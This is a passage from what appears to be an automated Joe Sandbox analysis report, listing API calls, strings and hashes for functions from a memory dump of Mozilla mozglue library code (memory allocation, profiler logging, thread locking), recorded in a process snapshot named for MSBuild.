                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C899697
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C8996E8
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C899707
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C89971F
                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C899773
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C8997B7
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32 ref: 6C8997D0
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32 ref: 6C8997EB
                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C899824
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                                                                                                                                                                                      • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                                                                                                                      • API String ID: 3361784254-3880535382
                                                                                                                                                                                                                      • Opcode ID: 62355092bb7928bb7e58ce4801a031d0d79aae86ed25bb9d3cac41219269e1da
                                                                                                                                                                                                                      • Instruction ID: 773b3821416c2508f1df4948fe5c638291aed6503047f9f1e81f432fd429f3c0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 62355092bb7928bb7e58ce4801a031d0d79aae86ed25bb9d3cac41219269e1da
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8561D271708205EFDF20CF6CD984B9A7BB4FB4A719F20492DE91993B80DB309954CB92
                                                                                                                                                                                                                      Function 6C883AB0 Relevance: 24.2, APIs: 13, Strings: 3, Instructions: 240COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E768,?,00003000,00000004), ref: 6C883AC5
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E768,?,00003000,00000004), ref: 6C883AE5
                                                                                                                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,?,00003000,00000004), ref: 6C883AFB
                                                                                                                                                                                                                      • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C883B57
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E784), ref: 6C883B81
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E784), ref: 6C883BA3
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E7B8), ref: 6C883BAE
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E7B8), ref: 6C883C74
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E784), ref: 6C883C8B
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E784), ref: 6C883C9F
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E7B8), ref: 6C883D5C
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E784), ref: 6C883D67
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E784), ref: 6C883D8A
                                                                                                                                                                                                                        • Part of subcall function 6C8C0D60: VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C883DEF), ref: 6C8C0D71
                                                                                                                                                                                                                        • Part of subcall function 6C8C0D60: VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C883DEF), ref: 6C8C0D84
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$Leave$Enter$Virtual$Free$Alloc
                                                                                                                                                                                                                      • String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_CRASH()
                                                                                                                                                                                                                      • API String ID: 2380290044-2272602182
                                                                                                                                                                                                                      • Opcode ID: c1960fb07fc47933d61304b30e4f0017332eeab9cba5128a3a2829da5d6724ec
                                                                                                                                                                                                                      • Instruction ID: b36c22d6f31679bf913ae5396bd8882dda0e48ef8038eda4c35f26f2dfde7c4f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c1960fb07fc47933d61304b30e4f0017332eeab9cba5128a3a2829da5d6724ec
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0491C2717062058BDB24CF68CAD4B6A77B2FB85B15B25492CE9219BF85DB70DC00CBD1
                                                                                                                                                                                                                      Function 6C897FD0 Relevance: 24.2, APIs: 16, Instructions: 166COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 6C898007
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(?,000000FF,00000000,00000000,?), ref: 6C89801D
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: malloc.MOZGLUE(?), ref: 6C89CA26
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?,?), ref: 6C89802B
                                                                                                                                                                                                                      • K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 6C89803D
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000104,000000FF,00000000,?,?,?,?,?,?), ref: 6C89808D
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: mozalloc_abort.MOZGLUE(?), ref: 6C89CAA2
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 6C89809B
                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C8980B9
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C8980DF
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8980ED
                                                                                                                                                                                                                      • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8980FB
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C89810D
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C898133
                                                                                                                                                                                                                      • free.MOZGLUE(00000000,000000FF,00000000,?,?,?,?,?,?), ref: 6C898149
                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?), ref: 6C898167
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6C89817C
                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C898199
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$memsetmoz_xmalloc$EnumModulesProcess$ErrorFileLastModuleNamemallocmozalloc_abortwcscpy_s
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2721933968-0
                                                                                                                                                                                                                      • Opcode ID: 9a1f11fb8cac39bfaefe6e0cd60a9b50950e9a488d6f90635136dd5809ed21a8
                                                                                                                                                                                                                      • Instruction ID: 17d561da4ea35a109a8b60a632744df36a8c5d0ccd4d91b4da21ad5f57d59327
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9a1f11fb8cac39bfaefe6e0cd60a9b50950e9a488d6f90635136dd5809ed21a8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7651B4B2E002059BDB20DBADDD849EFB7B9EF49264F240939E815E7741E730D905CBA1
                                                                                                                                                                                                                      Function 6C8911B0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 186COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32,00000084), ref: 6C891213
                                                                                                                                                                                                                      • toupper.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C891285
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32,00000076), ref: 6C8912B9
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32,00000078,?), ref: 6C891327
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32, xrefs: 6C89120D
                                                                                                                                                                                                                      • CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32, xrefs: 6C89131B
                                                                                                                                                                                                                      • TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32, xrefs: 6C8912AD
                                                                                                                                                                                                                      • &, xrefs: 6C89126B
                                                                                                                                                                                                                      • MZx, xrefs: 6C8911E1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$toupper
                                                                                                                                                                                                                      • String ID: &$CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32$Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32$MZx$TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32
                                                                                                                                                                                                                      • API String ID: 403083179-3658087426
                                                                                                                                                                                                                      • Opcode ID: 82fc7cffb299197fb250a7ead6f5f9a5207de2d657c18b6c7952d28267f8f0d0
                                                                                                                                                                                                                      • Instruction ID: d90339e34a95a80e700f8eab8f3f07857e621b2167f3dd4d9ffb2a263a62d522
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 82fc7cffb299197fb250a7ead6f5f9a5207de2d657c18b6c7952d28267f8f0d0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA71A671A093548ADB309F6CCA407DEB7FABF48349F040A6DD445A3B40D734AA89CB92
                                                                                                                                                                                                                      Function 6C8831C0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 183timelibraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C883217
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C883236
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32 ref: 6C88324B
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C883260
                                                                                                                                                                                                                      • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C88327F
                                                                                                                                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C88328E
                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C8832AB
                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C8832D1
                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C8832E5
                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C8832F7
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: EnterCriticalSection.KERNEL32(6C90E370,?,?,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284), ref: 6C8BAB94
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: LeaveCriticalSection.KERNEL32(6C90E370,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284,?,?,6C8A56F6), ref: 6C8BABD1
                                                                                                                                                                                                                      • __aulldiv.LIBCMT ref: 6C88346B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Time$StampV01@@Value@mozilla@@$CriticalLibrarySectionStamp@mozilla@@$AddressCreation@EnterFreeInit_thread_footerLeaveLoadNow@ProcProcessV12@V12@___aulldiv
                                                                                                                                                                                                                      • String ID: KernelBase.dll$QueryInterruptTime
                                                                                                                                                                                                                      • API String ID: 3006643210-2417823192
                                                                                                                                                                                                                      • Opcode ID: db17fd33588697ef1df0646b975892f8c1d03e18b071f57d3feb7873cb9ea03c
                                                                                                                                                                                                                      • Instruction ID: 6dd2d8aeba200b16a3772310a8bb657e55e3aaa139bb0efeed17fe29ae00eede
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db17fd33588697ef1df0646b975892f8c1d03e18b071f57d3feb7873cb9ea03c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1961F471A097419BC721CF38C45165BB3F4FFC6354F218B2DE8A5A3A91EB319949CB82
                                                                                                                                                                                                                      Function 6C8E6660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 162threadCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(6C90F618), ref: 6C8E6694
                                                                                                                                                                                                                      • GetThreadId.KERNEL32(?), ref: 6C8E66B1
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8E66B9
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000100), ref: 6C8E66E1
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90F618), ref: 6C8E6734
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6C8E673A
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90F618), ref: 6C8E676C
                                                                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 6C8E67FC
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C8E6868
                                                                                                                                                                                                                      • RtlCaptureContext.NTDLL ref: 6C8E687F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
                                                                                                                                                                                                                      • String ID: WalkStack64
                                                                                                                                                                                                                      • API String ID: 2357170935-3499369396
                                                                                                                                                                                                                      • Opcode ID: 40977d62a2479afbf19ff1872799596af9092bd45e92f9ab89a96ab23bcfd565
                                                                                                                                                                                                                      • Instruction ID: 0031a9cd2b8fbc400b12322bfc61a45a063feafae21e49be60329ed477147fc9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40977d62a2479afbf19ff1872799596af9092bd45e92f9ab89a96ab23bcfd565
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB51AB71A09305AFDB21CF25CA44B5ABBF4FF8A714F10492DFA9887640D770E908CB92
                                                                                                                                                                                                                      Function 6C8CDE60 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 135threadCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C894A68), ref: 6C8C945E
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C8C9470
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C8C9482
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: __Init_thread_footer.LIBCMT ref: 6C8C949F
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CDE73
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CDF7D
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CDF8A
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CDFC9
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CDFF7
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8CE000
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C894A68), ref: 6C8CDE7B
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8C94EE
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C8C9508
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: GetCurrentProcess.KERNEL32(?,6C8831A7), ref: 6C8BCBF1
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C8831A7), ref: 6C8BCBFA
                                                                                                                                                                                                                      • ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C894A68), ref: 6C8CDEB8
                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,6C894A68), ref: 6C8CDEFE
                                                                                                                                                                                                                      • ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C8CDF38
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • <none>, xrefs: 6C8CDFD7
                                                                                                                                                                                                                      • [I %d/%d] locked_profiler_stop, xrefs: 6C8CDE83
                                                                                                                                                                                                                      • [I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C8CE00E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
                                                                                                                                                                                                                      • String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
                                                                                                                                                                                                                      • API String ID: 1281939033-809102171
                                                                                                                                                                                                                      • Opcode ID: 71215998e1b23f13dfbf178f645cff7064d303aaf5da9b64820443765ba4e8e3
                                                                                                                                                                                                                      • Instruction ID: 16d41a54cc87097126bb870f88209a8d61d5578face551152c9dc678b2d9600a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71215998e1b23f13dfbf178f645cff7064d303aaf5da9b64820443765ba4e8e3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C41F3317056109BDB20AF68CA487AAB775FB8630CF24082EED1997F01CB71D905CBE6
                                                                                                                                                                                                                      Function 6C8DD840 Relevance: 21.2, APIs: 14, Instructions: 206threadtimeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8DD85F
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C8DD86C
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C8DD918
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8DD93C
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C8DD948
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C8DD970
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8DD976
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C8DD982
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C8DD9CF
                                                                                                                                                                                                                      • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C8DDA2E
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8DDA6F
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C8DDA78
                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE ref: 6C8DDA91
                                                                                                                                                                                                                        • Part of subcall function 6C8A5C50: GetTickCount64.KERNEL32 ref: 6C8A5D40
                                                                                                                                                                                                                        • Part of subcall function 6C8A5C50: EnterCriticalSection.KERNEL32(6C90F688), ref: 6C8A5D67
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C8DDAB7
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Count64CriticalEnterSectionStampTickTimeV01@@Value@mozilla@@Xbad_function_call@std@@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1195625958-0
                                                                                                                                                                                                                      • Opcode ID: 77a54ad70abf2d84dcc3d46b1e432220d038f3541cfb3c4efd0fd1c1c7f5b7cb
                                                                                                                                                                                                                      • Instruction ID: e34b939c8a02667a1de549d06cf1627bcfb471939a135c748c209792b3ef9b64
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 77a54ad70abf2d84dcc3d46b1e432220d038f3541cfb3c4efd0fd1c1c7f5b7cb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81718D75604304DFCB10CF29C884A9ABBF5FF89354F25896EE85A9B301DB31A944CBA1
                                                                                                                                                                                                                      Function 6C8DD4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8DD4F0
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C8DD4FC
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C8DD52A
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8DD530
